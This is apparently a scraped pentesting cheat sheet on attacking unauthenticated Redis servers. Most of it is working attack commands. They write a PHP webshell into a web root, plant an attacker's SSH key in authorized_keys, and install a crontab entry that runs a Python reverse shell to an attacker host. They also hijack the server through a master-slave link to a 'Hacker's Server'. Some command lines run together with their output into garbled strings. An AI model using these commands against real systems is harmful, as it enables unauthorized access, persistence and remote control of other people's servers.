Redis is an open source (BSD licensed), in-memory data structure store, used as a database, cache and message broker (from here).
Default port: 6379
PORT STATE SERVICE VERSION6379/tcp open redis Redis key-value store 4.0.9
nmap --script redis-info -sV -p 6379 <IP>msf> use auxiliary/scanner/redis/redis_server
Several times redis will be configured to be accessible anonymously. In this case you won't need to use any username and password. Talk to redis service and execute the
info command, it will let you know a lot of information about the server: SO running, Clients, memory...
Another interesting command to run is
config get * this will let you know several strings related to the service and one of them could be the home of the redis user (/var/lib/redis, another possible path could be /home/redis/.ssh), and knowing this you know where you can write the
You can also use
keys * to list the keys and the
get <key> to get them.
sudo apt-get install redis-tools
redis-cli -h 192.168.0.24122.214.171.124:6379> info192.168.0.24:6379> CONFIG GET *192.168.0.24:6379> keys *192.168.0.24:6379> get 351115ba5f690fb9b1bdc1b41e673a94 #This is a key list on the last command
To exploit a bad configured Redis you should try: https://github.com/Avinash-acid/Redis-Server-Exploit
You must know the path of the Web site folder:
root@Urahara:~# redis-cli -h 10.85.0.5210.85.0.52:6379> config set dir /usr/share/nginx/htmlOK10.85.0.52:6379> config set dbfilename redis.phpOK10.85.0.52:6379> set test "<?php phpinfo(); ?>"OK10.85.0.52:6379> saveOK
If the webshell access exception, you can empty the database after backup and try again, remember to restore the database.
Generate a ssh public-private key pair on your pc:
ssh-keygen -t rsa
Write the public key to a file :
(echo -e "\n\n"; cat ./.ssh/id_rsa.pub; echo -e "\n\n") > foo.txt
Import the file into redis :
cat foo.txt | redis-cli -h 10.85.0.52 -x set crackit
Save the public key to the authorized_keys file on redis server:
root@Urahara:~# redis-cli -h 10.85.0.5210.85.0.52:6379> config set dir /home/test/.ssh/OK10.85.0.52:6379> config set dbfilename "authorized_keys"OK10.85.0.52:6379> saveOK
Finally, you can ssh to the redis server with private key : ssh -i id_rsa email@example.com
root@Urahara:~# echo -e "\n\n*/1 * * * * /usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.85.0.53\",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'\n\n"|redis-cli -h 10.85.0.52 -x set 1OKroot@Urahara:~# redis-cli -h 10.85.0.52 config set dir /var/spool/cron/crontabs/OKroot@Urahara:~# redis-cli -h 10.85.0.52 config set dbfilename rootOKroot@Urahara:~# redis-cli -h 10.85.0.52 saveOK
The last exampleis for Ubuntu, for Centos, the above command should be:
redis-cli -h 10.85.0.52 config set dir /var/spool/cron/
This method can also be used to earn bitcoin ：yam
The master redis all operations are automatically synchronized to the slave redis, which means that we can regard the vulnerability redis as a slave redis, connected to the master redis which our own controlled, then we can enter the command to our own redis.
master redis : 10.85.0.51 (Hacker's Server)slave redis : 10.85.0.52 (Target Vulnerability Server)A master-slave connection will be established from the slave redis and the master redis:redis-cli -h 10.85.0.52 -p 6379slaveof 10.85.0.51 6379Then you can login to the master redis to control the slave redis:redis-cli -h 10.85.0.51 -p 6379set mykey helloset mykey2 helloworld